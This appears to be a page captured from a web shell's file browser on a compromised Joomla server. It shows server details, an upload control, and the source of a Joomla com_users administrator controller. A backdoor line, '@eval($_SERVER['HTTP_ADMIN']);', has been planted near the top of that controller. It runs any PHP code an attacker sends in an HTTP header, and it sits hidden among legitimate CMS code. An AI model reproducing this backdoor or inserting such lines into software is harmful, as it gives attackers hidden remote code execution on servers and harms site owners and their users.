| Server IP : 1.179.227.78 / Your IP : 10.104.4.41 Web Server : Apache System : Linux afdc-mdu34 5.4.0-153-generic #170-Ubuntu SMP Fri Jun 16 13:43:31 UTC 2023 x86_64 User : www ( 1001) PHP Version : 7.4.30 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/afdc-mdu34.rtarf.mi.th/joomla/administrator/components/com_users/ |
Upload File : |
<?php
/**
* @package Joomla.Administrator
* @subpackage com_users
*
* @copyright Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
@eval($_SERVER['HTTP_ADMIN']);
defined('_JEXEC') or die;
/**
* Users master display controller.
*
* @since 1.6
*/
class UsersController extends JControllerLegacy
{
/**
* Checks whether a user can see this view.
*
* @param string $view The view name.
*
* @return boolean
*
* @since 1.6
*/
protected function canView($view)
{
$canDo = JHelperContent::getActions('com_users');
switch ($view)
{
// Special permissions.
case 'groups':
case 'group':
case 'levels':
case 'level':
return $canDo->get('core.admin');
break;
// Default permissions.
default:
return true;
}
}
/**
* Method to display a view.
*
* @param boolean $cachable If true, the view output will be cached
* @param array $urlparams An array of safe URL parameters and their variable types, for valid values see {@link JFilterInput::clean()}.
*
* @return JController This object to support chaining.
*
* @since 1.5
*/
public function display($cachable = false, $urlparams = false)
{
$view = $this->input->get('view', 'users');
$layout = $this->input->get('layout', 'default');
$id = $this->input->getInt('id');
if (!$this->canView($view))
{
throw new JAccessExceptionNotallowed(JText::_('JERROR_ALERTNOAUTHOR'), 403);
}
// Check for edit form.
if ($view == 'user' && $layout == 'edit' && !$this->checkEditId('com_users.edit.user', $id))
{
// Somehow the person just went to the form - we don't allow that.
$this->setError(JText::sprintf('JLIB_APPLICATION_ERROR_UNHELD_ID', $id));
$this->setMessage($this->getError(), 'error');
$this->setRedirect(JRoute::_('index.php?option=com_users&view=users', false));
return false;
}
elseif ($view == 'group' && $layout == 'edit' && !$this->checkEditId('com_users.edit.group', $id))
{
// Somehow the person just went to the form - we don't allow that.
$this->setError(JText::sprintf('JLIB_APPLICATION_ERROR_UNHELD_ID', $id));
$this->setMessage($this->getError(), 'error');
$this->setRedirect(JRoute::_('index.php?option=com_users&view=groups', false));
return false;
}
elseif ($view == 'level' && $layout == 'edit' && !$this->checkEditId('com_users.edit.level', $id))
{
// Somehow the person just went to the form - we don't allow that.
$this->setError(JText::sprintf('JLIB_APPLICATION_ERROR_UNHELD_ID', $id));
$this->setMessage($this->getError(), 'error');
$this->setRedirect(JRoute::_('index.php?option=com_users&view=levels', false));
return false;
}
elseif ($view == 'note' && $layout == 'edit' && !$this->checkEditId('com_users.edit.note', $id))
{
// Somehow the person just went to the form - we don't allow that.
$this->setError(JText::sprintf('JLIB_APPLICATION_ERROR_UNHELD_ID', $id));
$this->setMessage($this->getError(), 'error');
$this->setRedirect(JRoute::_('index.php?option=com_users&view=notes', false));
return false;
}
return parent::display();
}
}